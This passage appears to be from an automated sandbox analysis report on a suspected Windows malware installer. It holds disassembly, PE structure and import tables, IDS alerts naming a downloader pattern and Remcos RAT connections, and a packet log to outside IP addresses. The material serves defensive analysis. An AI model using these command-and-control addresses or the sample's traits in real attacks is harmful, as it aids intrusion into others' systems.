                                      mov dword ptr [esp+1Ch], ebx
                                      call dword ptr [004080CCh]
                                      call dword ptr [004080D0h]
                                      and eax, BFFFFFFFh
                                      cmp ax, 00000006h
                                      mov dword ptr [007A8A6Ch], eax
                                      je 00007F488CBAAB53h
                                      push ebx
                                      call 00007F488CBADE41h
                                      cmp eax, ebx
                                      je 00007F488CBAAB49h
                                      push 00000C00h
                                      call eax
                                      mov esi, 004082B0h
                                      push esi
                                      call 00007F488CBADDBBh
                                      push esi
                                      call dword ptr [00408154h]
                                      lea esi, dword ptr [esi+eax+01h]
                                      cmp byte ptr [esi], 00000000h
                                      jne 00007F488CBAAB2Ch
                                      push 0000000Bh
                                      call 00007F488CBADE14h
                                      push 00000009h
                                      call 00007F488CBADE0Dh
                                      push 00000007h
                                      mov dword ptr [007A8A64h], eax
                                      call 00007F488CBADE01h
                                      cmp eax, ebx
                                      je 00007F488CBAAB51h
                                      push 0000001Eh
                                      call eax
                                      test eax, eax
                                      je 00007F488CBAAB49h
                                      or byte ptr [007A8A6Fh], 00000040h
                                      push ebp
                                      call dword ptr [00408038h]
                                      push ebx
                                      call dword ptr [00408298h]
                                      mov dword ptr [007A8B38h], eax
                                      push ebx
                                      lea eax, dword ptr [esp+34h]
                                      push 000002B4h
                                      push eax
                                      push ebx
                                      push 0079FF08h
                                      call dword ptr [0040818Ch]
                                      push 0040A2C8h
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3de000 | 0x56ef8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xdcda0 | 0x8f8 | .data
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x656c | 0x6600 | 12117ad2476c7a7912407af0dcfcb8a7 | False | 0.6737515318627451 | data | 6.47208759712619 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1398 | 0x1400 | e3e8d62e1d2308b175349eb9daa266c8 | False | 0.4494140625 | data | 5.137750894959169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x39eb78 | 0x600 | 2020ca26e010546720fd467c5d087b57 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a9000 | 0x35000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3de000 | 0x56ef8 | 0x57000 | c1896e67b80e50079ebeadcac8c0d8c3 | False | 0.13646338451867815 | data | 2.5203155069997596 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3de2c8 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | English | United States | 0.11415584223451786
RT_ICON | 0x4202f0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.17530758310658937
RT_ICON | 0x430b18 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.27551867219917014
RT_ICON | 0x4330c0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.3295028142589118
RT_ICON | 0x434168 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.47074468085106386
RT_DIALOG | 0x4345d0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x4346d0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x4347f0 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x4348b8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x434918 | 0x4c | data | English | United States | 0.7894736842105263
RT_VERSION | 0x434968 | 0x250 | data | English | United States | 0.5287162162162162
RT_MANIFEST | 0x434bb8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-04T09:27:22.500689+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.8 | 49705 | TCP
2024-11-04T09:27:31.787759+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49709 | 212.162.149.38 | 80 | TCP
2024-11-04T09:27:36.768609+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.8 | 49710 | 162.251.122.106 | 2404 | TCP
2024-11-04T09:27:37.564253+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.8 | 49711 | 162.251.122.106 | 2404 | TCP
2024-11-04T09:27:37.819920+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.8 | 49712 | 178.237.33.50 | 80 | TCP
2024-11-04T09:28:01.311250+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.8 | 49713 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Nov 4, 2024 09:27:32.159667969 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159686089 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159770012 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159784079 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159811974 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159821033 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159831047 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159866095 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.160387039 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.160399914 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.160413027 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.160435915 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.160437107 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.160464048 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.160479069 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169099092 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169111967 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169125080 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169156075 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169171095 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169203043 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169219017 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169255018 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169269085 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169337034 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169351101 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169363022 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169374943 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169384003 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169389009 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169415951 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169450998 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169522047 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169568062 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169681072 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169728994 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169743061 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169756889 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169789076 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169801950 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169867992 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169903994 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169914961 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169917107 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169945002 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169970036 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170031071 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170043945 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170072079 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170088053 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170170069 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170209885 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170248032 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170262098 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170290947 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170305014 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170387983 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170401096 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170413971 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170428038 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170438051 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170454025 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170490026 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170515060 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170557022 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170594931 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170608044 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170638084 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170650959 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170861959 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170938969 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170950890 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170984983 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.171020985 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.171034098 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.171051979 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.171077967 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.212682962 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.212719917 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.212730885 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.212734938 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.212793112 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.212819099 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.212819099 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.212894917 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.280586958 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280670881 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280683994 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.280731916 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.280776024 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280832052 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280843973 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280879021 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.280904055 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.280915022 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280930996 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280942917 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280963898 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.280988932 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281080961 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281174898 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281186104 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281203032 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281214952 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281220913 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281229019 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281244040 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281258106 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281285048 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281433105 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281476021 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281487942 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281506062 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281526089 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281542063 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281599998 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281682968 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281693935 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281723022 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281734943 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281750917 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281774044 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281817913 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281830072 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281858921 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281871080 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281903028 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281914949 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281951904 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282027960 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282038927 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282051086 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282063961 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282078981 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282089949 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282120943 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282164097 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282176018 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282187939 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282211065 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282238007 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282588005 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282607079 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282618999 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282654047 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282748938 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282763004 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282773972 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282787085 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282808065 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282820940 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282885075 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282897949 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282907963 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.282929897 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.282951117 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292507887 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292538881 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292550087 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292614937 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292684078 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292697906 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292714119 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292725086 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292742968 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292763948 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292797089 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292835951 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292910099 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292920113 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292929888 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292941093 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292948961 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292954922 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292968035 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.292975903 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.292994022 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293016911 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293179989 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293195009 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293206930 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293219090 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293226957 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293229103 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293247938 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293265104 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293371916 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293432951 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293442011 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293469906 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293488979 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293524981 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293535948 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293545008 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293561935 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293584108 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293617964 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293675900 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293688059 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293713093 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293723106 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293817043 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293828011 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293838024 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293849945 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.293858051 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293876886 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293901920 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.293991089 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.294001102 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.294034004 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.294083118 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.294164896 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.294203043 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.335908890 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.335947990 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.335959911 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.336024046 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.336046934 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.336059093 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.336102009 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404017925 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404038906 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404050112 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404053926 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404059887 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404071093 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404078007 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404170990 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404222012 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404231071 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404242039 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404253006 CET8049709212.162.149.38192.168.2.8
